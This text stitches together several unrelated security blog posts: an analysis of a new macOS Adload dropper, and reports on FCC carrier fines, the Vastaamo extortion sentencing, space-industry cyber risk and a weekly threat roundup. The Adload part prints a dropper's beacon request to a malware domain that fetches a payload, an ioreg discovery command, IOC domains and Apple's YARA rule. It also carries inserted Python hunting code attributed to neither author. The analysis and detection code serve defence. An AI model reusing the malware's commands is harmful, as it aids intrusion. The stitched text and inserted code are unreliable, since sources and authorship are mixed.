macOS Adload | Prolific Adware Pivots Just Days After Apple’s XProtect Clampdown 

It’s been little more than a week since Apple rolled out an unprecedented 74 new rules to its XProtect malware signature list in version 2192. A further 10 rules were appended in version 2193 on April 30th. Cupertino’s security team were clearly hoping that a concerted effort would serve to disrupt prolific adware distributor Adload’s assault on macOS devices. Those behind the adware, however, appear to have pivoted quickly as dozens of new Adload samples are already appearing that evade Apple’s new signatures.

In this post, we take a look at one variant of these new samples that is almost entirely undetected on VirusTotal at this time. We hope this exposure will both help inform security teams looking to keep adware nuisances out of their environment and serve to boost detection recognition across other vendor engines.

Apple’s Massive Adload Signature Update

With XProtect version 2192, Apple added 74 new rules to XProtect.yara. While a few of these were targeted at other malware and adware distributors, the vast majority targeted adware widely known as Adload.

To put this update in context, prior to version 2192, XProtect had a total of 207 rules, with around two dozen targeting historical versions of Adload. With 2192, the rule count – taking into account both additions and removals – went up to 279, and then 289 with XProtect v2193.

While a few hundred malware rules pale in comparison to the efforts of external security vendors, who tend to have thousands if not tens of thousands of rules as well as behavioral and machine learning engines, growing the rule set by roughly a third (207 to 279 rules) in a single update represents a considerable amount of effort. Each rule has to be researched and thoroughly tested to ensure it will not cause false positives, that is, catch innocent programs in its attempt to block malicious ones.

That undertaking would have been ongoing for quite some time and Apple would have hoped that the final result would cause the adware distributor to experience major disruption. No one would expect such actors to just give up and go home – not when there’s significant amounts of money to be made – but it must have been hoped that it would take some time for the malware authors to reconstruct their codebase.

Not so, as it turns out. We began observing new versions of Adload that evade XProtect’s new signatures last week. Many of these were still widely detected by vendor engines, but by the weekend we were seeing Adload samples that were bypassing both XProtect and other vendors’ engines on VirusTotal.

[Figure: New Adload samples with low detection counts (VirusTotal)]

The XProtect update on the last day of April, v2193, did not address these changes to Adload, instead targeting other prolific adware distributors Pirrit and Bundlore.

New Adload Go Variant (Rload/Lador)

Of the new Adload variants that we have seen, one consistently showed up as having 0 or only 1 detection among VirusTotal engines. This variant has a file size of 4.55MB and is compiled solely for Intel x86_64 architecture. The binaries function as initial droppers for the next stage payload.

None of the early samples we saw this week showed relationships to a parent executable, application or disk image, and none were codesigned, leaving the specific distribution methods obscure, though typically these droppers are embedded in cracked or trojanized apps distributed by malicious websites, torrents and other means. However, all the new samples embedded a unique custom domain registered with NameCheap and following known Adload patterns.

SHA1                                      Domain
13312b3dad9633fa185351e28397c21415d95125  api[.]deployquest[.]com
21c447cac1c13a6804e52f216a4c41a20c963c01  api[.]searchwebmesh[.]com
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d  api[.]generalmodules[.]com
67a56aa269b9301981c0538ace75bec2cd381656  api[.]validexplorer[.]com
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0  api[.]operativeeng[.]com
912a2ab06d3afe89e8e2ad19d3300055f0e0a968  api[.]buffermanager[.]com
a99d03fc3b32742de6688274a3ee3cdaef0172bf  api[.]lookwebresults[.]com
f166eb63162ce4a5ac169e01c160be98b0e27e13  api[.]navigationbuffer[.]com
feb2c674f135410c3ced05c301f19ab461e37b20  api[.]inetprogress[.]com

On execution, the droppers perform system information discovery (T1082) via the ioreg utility:

ioreg -rd1 -c IOPlatformExpertDevice

The malware then resolves a hardcoded domain stored in the Go variable main.dwnldUrl (symbol sym._main.dwnldUrl) and sends an HTTP GET request to retrieve a remote gzip archive.

[Figure: hardcoded Adload domain in the dropper]

The request, as observed:

GET http[:]//api[.]operativeeng[.]com/ga?a=1104&b=E5282DF2-04D7-C854-BD9C-9B4A98F26EDC
Host: api[.]operativeeng[.]com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

The dropper writes the response to a subdirectory in /tmp/. The subdirectory name takes the form of /tmp/[0-9]{10}. If the remote server does not return a compressed archive, the subdirectory will contain an HTML 404 response.
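The three artifacts above (the hardware identifier gathered via ioreg, the beacon URL shape, and the /tmp/[0-9]{10} staging directory) are enough to hunt for without the binary in hand. The following Python is an added example and not code from the original post or from SentinelOne. It extracts the IOPlatformUUID from a constructed ioreg excerpt the way the machineid package Apple's rule names does; that the b= value in the beacon is this UUID is my assumption, based on its format. It then flags requests of the /ga?a=<id>&b=<UUID> shape in constructed proxy log lines (the log format is invented for the example), and classifies ten-digit /tmp subdirectories in a constructed temp tree by whether they hold a gzip payload or the server's 404 page.

```python
"""Hunting artifacts of the Adload Go dropper: the hardware UUID it collects,
the beacon it sends, and the /tmp/[0-9]{10} staging directory it creates.
Added example, not code from the original post or from SentinelOne.
All inputs are constructed inline, so this runs offline on any platform."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Domains from the post's IOC list.
ADLOAD_DOMAINS = {
    "api.buffermanager.com", "api.deployquest.com", "api.generalmodules.com",
    "api.inetprogress.com", "api.lookwebresults.com", "api.navigationbuffer.com",
    "api.operativeeng.com", "api.searchwebmesh.com", "api.validexplorer.com",
}

# 1. `ioreg -rd1 -c IOPlatformExpertDevice`: the machineid package reads the
# IOPlatformUUID out of this output. Constructed excerpt; real output has many
# more keys and the serial below is a placeholder.
SAMPLE_IOREG = """+-o MacBookPro16,1  <class IOPlatformExpertDevice, id 0x100000112, registered, matched, active, busy 0 (2 ms), retain 40>
    {
      "IOPlatformUUID" = "E5282DF2-04D7-C854-BD9C-9B4A98F26EDC"
      "IOPlatformSerialNumber" = "C02XXXXXXXXX"
      "model" = <"MacBookPro16,1">
    }
"""
UUID = r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}"
UUID_RE = re.compile(r'"IOPlatformUUID"\s*=\s*"(' + UUID + r')"', re.I)

def platform_uuid(ioreg_output: str) -> Optional[str]:
    """Return the IOPlatformUUID from ioreg text, or None if it is absent."""
    m = UUID_RE.search(ioreg_output)
    return m.group(1) if m else None

# 2. The beacon: GET http://api.<domain>/ga?a=<id>&b=<UUID> with Go's default
# user agent. Constructed proxy log format: <ts> <client> <method> <url> "<ua>".
SAMPLE_PROXY_LOG = [
    '2024-05-02T10:11:12Z 10.0.0.5 GET http://api.operativeeng.com/ga?a=1104&b=E5282DF2-04D7-C854-BD9C-9B4A98F26EDC "Go-http-client/1.1"',
    '2024-05-02T10:11:13Z 10.0.0.5 GET https://example.com/ "Mozilla/5.0"',
    '2024-05-02T10:12:40Z 10.0.0.9 GET http://api.searchwebmesh.com/ga?a=1104&b=0F3A1C2D-11AA-4B0C-9D8E-ABCDEF012345 "Go-http-client/1.1"',
    '2024-05-02T10:13:00Z 10.0.0.7 GET http://registry.example.net/v2/ "Go-http-client/1.1"',
]
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')
BEACON_RE = re.compile(r"^https?://(?P<host>[^/]+)/ga\?a=\d+&b=(?P<uuid>" + UUID + r")$", re.I)

def find_beacons(lines: List[str]) -> List[Dict[str, object]]:
    """Flag requests with the dropper's beacon shape. The Go user agent alone is
    not an indicator (every Go program sends it by default); the /ga?a=..&b=<UUID>
    path plus a known domain is what makes a hit worth an alert."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        b = BEACON_RE.match(m.group("url")) if m else None
        if not b:
            continue
        host = b.group("host").lower()
        hits.append({
            "client": m.group("client"),
            "host": host,
            "uuid": b.group("uuid").upper(),
            "go_ua": m.group("ua").startswith("Go-http-client/"),
            "known_domain": host in ADLOAD_DOMAINS,
        })
    return hits

# 3. The staging directory: /tmp/<10 digits>, holding either the gzip payload
# (magic 1f 8b) or, when the server had nothing to give, its HTML 404 page.
STAGING_RE = re.compile(r"^\d{10}$")

def classify_staging_dirs(tmp_root: str) -> Dict[str, str]:
    """Map each <10 digits> subdirectory of tmp_root to what it contains."""
    result: Dict[str, str] = {}
    for entry in Path(tmp_root).iterdir():
        if not (entry.is_dir() and STAGING_RE.match(entry.name)):
            continue
        verdict = "empty"
        for f in entry.iterdir():
            if not f.is_file():
                continue
            head = f.read_bytes()[:512]
            if head[:2] == b"\x1f\x8b":
                verdict = "gzip-payload"
                break
            verdict = "html-404" if b"404" in head and b"<html" in head.lower() else "other"
        result[entry.name] = verdict
    return result

def build_demo_tmp() -> str:
    """Create a constructed /tmp lookalike for the demonstration; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="adload-demo-"))
    (root / "1714651234").mkdir()
    (root / "1714651234" / "stage2.gz").write_bytes(b"\x1f\x8b\x08\x00" + b"\x00" * 16)
    (root / "1714651999").mkdir()
    (root / "1714651999" / "resp").write_bytes(b"<html><head><title>404 Not Found</title></head></html>")
    (root / "not-a-staging-dir").mkdir()
    return str(root)

if __name__ == "__main__":
    print("hardware UUID:", platform_uuid(SAMPLE_IOREG))
    for hit in find_beacons(SAMPLE_PROXY_LOG):
        print("beacon:", hit)
    print("staging:", classify_staging_dirs(build_demo_tmp()))
```

On a real fleet, point classify_staging_dirs at /tmp and feed find_beacons your proxy or DNS logs after adapting LOG_RE to their format. Treat a hit on a domain outside ADLOAD_DOMAINS as a lead rather than a verdict: the beacon shape is distinctive, but the domain list rotates with every campaign.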

Minor Tweak Evades XProtect Signature Rule

Looking at the binaries from a static point of view, there are a number of interesting artifacts. These binaries use an external (and legitimate) Go package, github.com/denisbrodbeck/machineid, to determine the machine’s unique ID.

The function that uses this package also calls sym._os_exec.Command to shell out commands. Although Apple’s signature targets both of these artifacts, the malware still evades XProtect. The rule in XProtect.yara responsible for protecting Macs against these adware droppers is as follows:

rule macos_smolgolf_adload_dropper
{
meta:
    description = "MACOS.ADLOAD"
strings:
    $varName = "main.DownloadURL"
    $libraryName = "github.com/denisbrodbeck/machineid.ID"
    $execCommand = "os/exec.Command"
condition:
    Macho and all of them
}

However, the rule misses the latest samples because the authors renamed the variable: the required string main.DownloadURL is now main.dwnldUrl, so the all-of-them condition fails even though the other two strings are still present in the binary.
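To see exactly why the rule misses, here is its condition re-implemented in plain Python (an added example, not Apple's or SentinelOne's code, and no yara module required) and run over constructed byte blobs that stand in for the old dropper, the new dropper, and two benign Go tools. The "loosened" variant is hypothetical, included to show what relaxing the exact variable name buys and what it costs in false positives; the is_macho helper follows the magic-number check in XProtect's private Macho rule, and the set of magics it accepts is my assumption about that rule.

```python
"""Why a one-token rename defeats macos_smolgolf_adload_dropper.
Added example, not Apple's or SentinelOne's code: the rule's matching logic is
re-implemented in plain Python (no yara module needed) and run over constructed
byte blobs standing in for the old dropper, the new dropper, and benign Go tools."""
import re
import struct
from typing import Callable, Dict

# The Macho private rule in XProtect.yara accepts a Mach-O or fat magic at
# offset 0 in either byte order. This set is an assumption about that rule.
MACHO_MAGICS = {0xfeedface, 0xcefaedfe, 0xfeedfacf, 0xcffaedfe, 0xcafebabe, 0xbebafeca}

def is_macho(data: bytes) -> bool:
    """Equivalent of the `Macho and ...` prefix: uint32(0) is a known magic."""
    return len(data) >= 4 and struct.unpack("<I", data[:4])[0] in MACHO_MAGICS

MACHINEID = b"github.com/denisbrodbeck/machineid.ID"
EXEC_CMD = b"os/exec.Command"

def apple_rule(data: bytes) -> bool:
    """macos_smolgolf_adload_dropper as published: Macho and all three strings."""
    return is_macho(data) and all(s in data for s in (b"main.DownloadURL", MACHINEID, EXEC_CMD))

# Hypothetical loosened variant (not an Apple rule): keep the two strings the
# authors left untouched and accept any main.<name>Url / URL variable instead
# of the exact `main.DownloadURL`.
URLVAR_RE = re.compile(rb"main\.[A-Za-z0-9_]{0,24}[Uu][Rr][Ll]\b")

def loosened_rule(data: bytes) -> bool:
    return is_macho(data) and MACHINEID in data and EXEC_CMD in data and URLVAR_RE.search(data) is not None

def fake_macho(*strings: bytes) -> bytes:
    """Constructed stand-in for a binary: 64-bit little-endian Mach-O magic,
    a zeroed header stub, then NUL-terminated strings."""
    return struct.pack("<I", 0xfeedfacf) + b"\x00" * 28 + b"".join(s + b"\x00" for s in strings)

SAMPLES: Dict[str, bytes] = {
    "old_dropper": fake_macho(b"main.DownloadURL", MACHINEID, EXEC_CMD),
    "new_dropper": fake_macho(b"main.dwnldUrl", MACHINEID, EXEC_CMD),
    # Benign Go tool that shells out and reads the machine id, no URL variable.
    "benign": fake_macho(b"main.configPath", MACHINEID, EXEC_CMD),
    # Benign Go updater: same two strings plus a URL variable of its own. The
    # loosened rule flags it, which is the false-positive cost of loosening.
    "benign_updater": fake_macho(b"main.updateUrl", MACHINEID, EXEC_CMD),
}

RULES: Dict[str, Callable[[bytes], bool]] = {"apple": apple_rule, "loosened": loosened_rule}

def evaluate(samples: Dict[str, bytes]) -> Dict[str, Dict[str, bool]]:
    """Run every rule over every sample; returns {sample: {rule: matched}}."""
    return {name: {r: fn(blob) for r, fn in RULES.items()} for name, blob in samples.items()}

if __name__ == "__main__":
    for name, verdicts in evaluate(SAMPLES).items():
        print(f"{name:15} {verdicts}")
```

The point of the fourth sample is the trade-off Apple faces: any relaxation broad enough to survive a variable rename also starts to match legitimate Go programs that shell out and read the machine ID, which is exactly the false-positive risk each XProtect rule is tested against.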

SentinelOne Detects Adload

These and many other Adload samples are, however, detected by SentinelOne Singularity. Our multi-engine, defense-in-depth platform uses a combination of static and dynamic engines to ensure the highest level of protection.

While we hope that Apple will quickly update its signatures to account for this latest Adload pivot, XProtect’s YARA rules are fully readable by malware developers, so it is inevitable that any such change will be circumvented again before long.

Enterprises are advised to use a third party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.


Indicators of Compromise

File Hashes (SHA1)

13312b3dad9633fa185351e28397c21415d95125
21c447cac1c13a6804e52f216a4c41a20c963c01
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d
67a56aa269b9301981c0538ace75bec2cd381656
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0
912a2ab06d3afe89e8e2ad19d3300055f0e0a968
a99d03fc3b32742de6688274a3ee3cdaef0172bf
f166eb63162ce4a5ac169e01c160be98b0e27e13
feb2c674f135410c3ced05c301f19ab461e37b20

Domains

api[.]buffermanager[.]com
api[.]deployquest[.]com
api[.]generalmodules[.]com
api[.]inetprogress[.]com
api[.]lookwebresults[.]com
api[.]navigationbuffer[.]com
api[.]operativeeng[.]com
api[.]searchwebmesh[.]com
api[.]validexplorer[.]com


FCC Fines Major U.S. Wireless Carriers for Selling Customer Location Data

The U.S. Federal Communications Commission (FCC) today levied fines totaling nearly $200 million against the four major carriers, AT&T, Sprint, T-Mobile and Verizon, for illegally sharing access to customers’ location information without consent.

The fines mark the culmination of a more than four-year investigation into the actions of the major carriers. In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC said it found the carriers each sold access to its customers’ location information to ‘aggregators,’ who then resold access to the information to third-party location-based service providers.

“In doing so, each carrier attempted to offload its obligations to obtain customer consent onto downstream recipients of location information, which in many instances meant that no valid customer consent was obtained,” an FCC statement on the action reads. “This initial failure was compounded when, after becoming aware that their safeguards were ineffective, the carriers continued to sell access to location information without taking reasonable measures to protect it from unauthorized access.”

The FCC’s findings against AT&T, for example, show that AT&T sold customer location data directly or indirectly to at least 88 third-party entities. The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities. Location data for Sprint customers found its way to 86 third-party entities, and to 75 third-parties in the case of T-Mobile customers.

The commission said it took action after Sen. Ron Wyden (D-Ore.) sent a letter to the FCC detailing how a company called Securus Technologies had been selling location data on customers of virtually any major mobile provider to law enforcement officials.

That same month, KrebsOnSecurity broke the news that LocationSmart — a data aggregation firm working with the major wireless carriers — had a free, unsecured demo of its service online that anyone could abuse to find the near-exact location of virtually any mobile phone in North America.

The carriers promised to “wind down” location data sharing agreements with third-party companies. But in 2019, reporting at Vice.com showed that little had changed, detailing how reporters were able to locate a test phone after paying $300 to a bounty hunter who simply bought the data through a little-known third-party service.

Sen. Wyden said no one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card.

“I applaud the FCC for following through on my investigation and holding these companies accountable for putting customers’ lives and privacy at risk,” Wyden said in a statement today.

The FCC fined Sprint and T-Mobile $12 million and $80 million respectively. AT&T was fined more than $57 million, while Verizon received a $47 million penalty. Still, these fines represent a tiny fraction of each carrier’s annual revenues. For example, $47 million is less than one percent of Verizon’s total wireless service revenue in 2023, which was nearly $77 billion.

The fine amounts vary because they were calculated based in part on the number of days that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements). The FCC notes that AT&T and Verizon each took more than 320 days from the publication of the Times story to wind down their data sharing agreements; T-Mobile took 275 days; Sprint kept sharing customer location data for 386 days.

Update, 6:25 p.m. ET: Clarified that the FCC launched its investigation at the request of Sen. Wyden.

Man Who Mass-Extorted Psychotherapy Patients Gets Six Years

A 26-year-old Finnish man was sentenced to more than six years in prison today after being convicted of hacking into an online psychotherapy clinic, leaking tens of thousands of patient therapy records, and attempting to extort the clinic and patients.

On October 21, 2020, the Vastaamo Psychotherapy Center in Finland became the target of blackmail when a tormentor identified as “ransom_man” demanded payment of 40 bitcoins (~450,000 euros at the time) in return for a promise not to publish highly sensitive therapy session notes Vastaamo had exposed online.

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours. When Vastaamo declined to pay, ransom_man shifted to extorting individual patients. According to Finnish police, some 22,000 victims reported receiving targeted emails that threatened to publish their therapy notes online unless they paid a 500 euro ransom.

Finnish prosecutors quickly zeroed in on a suspect: Julius “Zeekill” Kivimäki, a notorious criminal hacker convicted of committing tens of thousands of cybercrimes before he became an adult. After being charged with the attack in October 2022, Kivimäki fled the country. He was arrested four months later in France, hiding out under an assumed name and passport.

Antti Kurittu is a former criminal investigator who worked on an investigation involving Kivimäki’s use of the Zbot botnet, among other activities Kivimäki engaged in as a member of the hacker group Hack the Planet (HTP).

Kurittu said the prosecution had demanded at least seven years in jail, and that the sentence handed down was six years and three months. Kurittu said prosecutors knocked a few months off of Kivimäki’s sentence because he agreed to pay compensation to his victims, and that Kivimäki will remain in prison during any appeal process.

“I think the sentencing was as expected, knowing the Finnish judicial system,” Kurittu told KrebsOnSecurity. “As Kivimäki has not been sentenced to a non-suspended prison sentence during the last five years, he will be treated as a first-timer, his previous convictions notwithstanding.”

But because juvenile convictions in Finland don’t count towards determining whether somebody is a first-time offender, Kivimäki will end up serving approximately half of his sentence.

“This seems like a short sentence when taking into account the gravity of his actions and the life-altering consequences to thousands of people, but it’s almost the maximum the law allows for,” Kurittu said.

Kivimäki initially gained notoriety as a self-professed member of the Lizard Squad, a mainly low-skilled hacker group that specialized in DDoS attacks. But American and Finnish investigators say Kivimäki’s involvement in cybercrime dates back to at least 2008, when he was introduced to a founding member of what would soon become HTP.

Finnish police said Kivimäki also used the nicknames “Ryan”, “RyanC” and “Ryan Cleary” (Ryan Cleary was actually a member of a rival hacker group — LulzSec — who was sentenced to prison for hacking).

Kivimäki and other HTP members were involved in mass-compromising web servers using known vulnerabilities, and by 2012 Kivimäki’s alias Ryan Cleary was selling access to those servers in the form of a DDoS-for-hire service. Kivimäki was 15 years old at the time.

In 2013, investigators going through devices seized from Kivimäki found computer code that had been used to crack more than 60,000 web servers using a previously unknown vulnerability in Adobe’s ColdFusion software. KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

As KrebsOnSecurity reported at the time, this small ColdFusion botnet of data broker servers was being controlled by the same cybercriminals who’d assumed control over SSNDOB, which operated one of the underground’s most reliable services for obtaining Social Security Number, dates of birth and credit file information on U.S. residents.

Kivimäki was responsible for making an August 2014 bomb threat against former Sony Online Entertainment President John Smedley that grounded an American Airlines plane. Kivimäki also was involved in calling in multiple fake bomb threats and “swatting” incidents — reporting fake hostage situations at an address to prompt a heavily armed police response to that location.

Ville Tapio, the former CEO of Vastaamo, was fired and also prosecuted following the breach. Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to protect sensitive patient records.

Investigators later found Vastaamo had originally been hacked in 2018 and again in 2019, but that Tapio never told anyone about the intrusions until ransom_man began his extortion spree. In April 2023, a Finnish court handed down a three-month sentence for Tapio, but that sentence was suspended because he had no previous criminal record.

PinnacleOne ExecBrief | Commercial Industry in Contested “Space”

Last week, PinnacleOne examined the state of aviation cybersecurity given recent incidents and federal action.

This week, we boost our view into orbit and dive into the intersection of cybersecurity and geopolitical risk facing the rapidly expanding space economy.


Insight Focus: Commercial Industry in Contested “Space”

In early April, the United States Space Force (USSF) released their first Commercial Space Strategy, embarking on a major shift in its approach to space operations, one that recognizes the pivotal role of the private sector in driving innovation. This USSF move to integrate commercial space solutions into “hybrid architectures” will raise critical issues of “dual-use capabilities” facing cyber and counterspace threats from China and Russia across peacetime, crisis, and conflict.

[Figure: The space economy is projected to expand rapidly alongside intensifying national competition and great power rivalry. Source: McKinsey/WEF]

This strategic shift is not just about leveraging commercial space capabilities, but also about managing the inherent cyber and interdependent risks that come with relying on private sector systems. The specter of cyberattacks on commercial space systems, with the potential for cascading impacts on military operations and the broader economy, looms large in this equation, even as the space economy is projected to reach $1.8T in value in the next 10 years.

Rapid innovations like SpaceX’s Starlink and Starshield, and other advanced orbital systems servicing an emerging commercial space economy present a double-edged sword for the USSF:

  • Opportunities to enhance capabilities and resilience in peacetime, while
  • Ensuring security and interoperability in crisis or conflict.

Investments by the U.S. and China in intelligence, tactical, and strategic platforms will drive most of the state-directed activity, but commercial and scientific activity will also accelerate as more nations get into the space game. Just in the last decade, the United Arab Emirates, for example, created a space agency, put an astronaut on the International Space Station (as did Saudi Arabia), sent a probe to Mars, and is collaborating with NASA on the lunar Artemis program.

Security Implications of Dual-Use Commercial Space Capabilities

One of the most significant challenges lies in the inherent ambiguity of dual-use space tech: capabilities developed for benign purposes (e.g., on-orbit satellite rendezvous) could also be used for military operations (e.g., tactical recon in a crisis or offensive operations in conflict). This blurs the lines between commercial and military applications and creates legal and ethical quandaries in a fast growing strategic industry mixed with large legacy government contractors and “deep tech” commercial startups desperate for product-market fit and sustainable business models.

The evolving risks in the space domain, starkly illustrated by Russia’s nuclear ASAT system and China’s growing space capabilities, underscore the paramount importance of robust Space Domain Awareness (SDA) and resilient architectures that give the U.S. warfighter an advantage in a contested environment. Chinese or Russian cyberattacks on US commercial satellites could disrupt military operations in crisis or conflict, with broad-scale and cascading commercial and economic effects on the ground.

The USSF’s approach to hardening immature startups is key, given the latter’s tight budget constraints and financial imperative to grow first, secure later. Space assets are of high value (to both their owners, customers, AND their attackers) but are deployed by businesses that require high capital investment and run on thin margins. This combination presents a real problem for DoD’s Commercial Space Strategy. This issue is of critical importance not only to firms in the space industry but also to those in cybersecurity and the vast array of businesses and sectors that depend on both – which, in today’s interconnected world, is essentially everyone.

The DoD has had ongoing challenges rolling out updated cybersecurity requirements for contractors, announcing plans for a revised “Cybersecurity Maturity Model Certification 2.0” program more than two years after it delayed an initial CMMC rule in late 2020. It may finally finalize the rule by the end of 2024 and requirements will waterfall down to all defense contractors soon after. Meanwhile, the USSF has already pushed out cybersecurity requirements that go beyond what CMMC requires, so space force contractors will have to comply with both.

Crisis and Conflict in Space

In a conflict scenario, the risk of kinetic or cyber attacks on U.S. commercial satellites is magnified. Balancing risk-sharing between USSF and the industry in peacetime is critical for resilience in war, as is the expectation setting for reciprocity, indemnification, and restitution.

In fact, the Space Force expects to begin identifying members of its newly formed Commercial Augmentation Space Reserve (CASR) by 2025 (the equivalent of DoD’s Civil Reserve Air Fleet for aviation and the Maritime Administration’s National Defense Reserve Fleet), focusing on space domain awareness, satellite communications and intelligence, surveillance and reconnaissance.

However, a critical distinction from the aviation and maritime domains is that in space, the moment it becomes known that a commercial platform is supporting a military mission, that platform becomes a target. Even membership of such a Reserve program will likely raise the risk profile for participating firms, given the pervasiveness of the threat environment in space. For example, PinnacleOne has advised participants in the CRAF that they are likely a target of Chinese military hacking groups tasked with executing disruptive or destructive attacks in a crisis or conflict.

The Space Force is moving quickly to embed strong contractual requirements for cybersecurity and operational reliability, but has yet to issue a formal construct for sharing relevant threat information with CASR members. Also, it is an open question if and how US Space Command (SPACECOM) would protect and defend commercial space assets if attacked.

Commercial Risk Management in Space

The USSF’s strategic principles provide a guiding framework for its peacetime efforts:

  • Balance
  • Interoperability
  • Resilience
  • Responsibility

However, significant obstacles remain in the face of near-peer competitor threats that could emerge in a crisis. The ambiguity of crisis conditions will stretch gaps in existing doctrine and operational collaboration. The lines of effort outlined in the strategy serve as important signposts in peacetime:

  • Transparency
  • Integration
  • Risk management
  • Securing the future

The true test, though, will come in addressing the counterspace and cyber capabilities of China and Russia in a conflict scenario, particularly for priority missions. This is already a challenge in terrestrial cyber operational collaboration between the public and private sectors, with issues relating to information sharing, overclassification, and tactical coordination and deconfliction.

The USSF faces a daunting challenge in leveraging commercial technologies in peacetime while managing the risks inherent in relying on private systems in a contested domain during conflict. Wargaming exercises that integrate commercial partners and red team simulations – at both the level of operational/tactical peers and government and enterprise leadership – will be vital in preparing for these eventualities.

A Strategic Shift

The shift to a model of consuming commercial solutions represents a seismic philosophical change for the USSF, given its history of using legacy primes developing cost-plus platforms “behind the Green Door” of special access program secrecy. Navigating the complexities of great power competition in peacetime while mitigating the risks of over-dependence on potentially vulnerable systems in conflict will require a delicate balancing act.

The integration of commercial solutions into hybrid architectures offers the promise of enhanced resilience in peacetime. However, it also expands the potential attack surface in a crisis or conflict scenario. The USSF’s approach to setting robust cybersecurity standards and collaborating closely with commercial partners to secure networks will be critical to managing these risks.

Ultimately, the success of the USSF Commercial Space Strategy will hinge on the ability to artfully manage the intricacies of commercial-military integration in peacetime while being prepared to counter the multi-dimensional threats posed by China and Russia in a crisis or conflict situation. The stakes could not be higher, as the outcome will have far-reaching implications for U.S. space superiority in an increasingly contested domain.

High Risk, High Reward

As the USSF navigates this uncharted territory, it will need to be agile, adaptive, and proactive in its approach. Balancing the imperatives of leveraging commercial innovation, ensuring security and resilience, and maintaining a decisive edge over near-peer competitors will require a level of strategic finesse unprecedented in the history of military space operations.

The Commercial Space Strategy represents a bold vision for the future of the USSF. Its success will depend on the ability to harness the immense potential of the private sector while mitigating the inherent risks and challenges. As the USSF embarks on this journey, it will need to be guided by a clear-eyed understanding of the strategic landscape and an unwavering commitment to maintaining U.S. space superiority in the face of an uncertain and contested future.

The Good, the Bad and the Ugly in Cybersecurity – Week 17

The Good | U.S. Govt Sends Spyware Abusers, Cybercriminals, and Crypto Launderers to Court

The U.S. government this week took three decisive actions against cyber criminals: a visa ban on thirteen spyware makers and sellers, sanctions against four Iranian nationals for their roles in recent cyberattacks, and criminal charges against the two operators of cryptocurrency mixing services.

Following the February announcement to set visa restrictions on commercial spyware developers and vendors, the Department of State has cracked down on the first thirteen individuals and their families. Excluding visa applications in this case effectively bans those who are linked to such operations from entering the U.S. The abuse of spyware has been a rising issue in recent years as adversaries use it to target persons of interest such as journalists, human rights advocates, academics, and government employees.

Two front companies and four individuals were sanctioned by the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) for their association with cyber activities supporting the Iranian Islamic Revolutionary Guard Corps Cyber Electronic Command (IRGC-CEC) over a span of five years. Collectively, the identified threat actors have targeted over a dozen U.S. organizations, including the U.S. government and defense contractors, through spear phishing and malware attacks, compromising over 200,000 employee accounts.

Responsible for processing more than $2 billion in ill-gotten funds for various criminal enterprises over nine years, two individuals have been charged by the Department of Justice with money laundering and operating an unlicensed money-transmitting business. Their services ‘Samourai’ and ‘Ricochet’ allowed criminals to sidestep law enforcement and hinder crypto exchanges from tracing the illegal source of the funds. Such services often provide a haven for criminals who require large-scale laundering and evasion of sanctions.

The Bad | Nation-State Actors Breach MITRE Research Center via Ivanti Zero-Days

MITRE Corporation disclosed a breach of their systems this week after threat actors chained two Ivanti zero-day vulnerabilities together in the attack. The breach was discovered in January when suspicious activity was found on MITRE’s unclassified prototyping network, Network Experimentation Research and Virtualization Environment (NERVE). MITRE’s research and development centers employ the nation’s leading scientists and engineers, building digital solutions for military, security, and intelligence organizations across the U.S.

After containing the incident, MITRE stated that affected parties were properly informed and relevant authorities engaged, with current efforts focused on restoring operations. Ongoing investigations show that the core network and partner systems were unaffected by the intrusion.

The threat actors compromised the non-profit’s VPNs by exploiting two Ivanti Connect Secure zero-days: an authentication bypass flaw tracked as CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1), a command injection flaw. Together, they allowed the attacker to use session hijacking to bypass multi-factor authentication (MFA) measures and move laterally through the network’s VMware infrastructure with an administrative account. Forensics also show the actors employing a combination of webshells and backdoors to establish persistence and harvest credentials.

The breach is suspected to be the work of state-sponsored threat actors and serves as a striking reminder that even cutting edge and highly-funded organizations are not immune from cyber threats. Targets on the level of NERVE, which in this case houses invaluable information on experimental methodologies and technologies, continue to be extremely lucrative for nation-state adversaries looking to either potentially steal or sabotage sensitive resources.

MITRE has released tactics, techniques, and procedures (TTPs) related to the breach in effort to spread lessons learned within the infosec community. CISA has also shared technical details and IoCs in a recent advisory.

Source: MITRE Corporation

The Ugly | GRU-Based APT Exploits Old Windows Flaw with New GooseEgg Tool to Target Government Entities

Despite being patched back in October 2022, a Windows Print Spooler vulnerability tracked as CVE-2022-38028 (CVSS 7.8) has made its way back into headlines this week. It is now being weaponized by the GRU-linked threat group APT28 (aka Forest Blizzard or Strontium) to deliver a previously unknown custom tool dubbed ‘GooseEgg’ that performs a slew of post-compromise activities.

GooseEgg has been leveraged possibly as early as April 2019 and has now been observed in attacks targeting North American, Western European, and Ukrainian governments, non-profit organizations, educational institutions, and transportation entities.

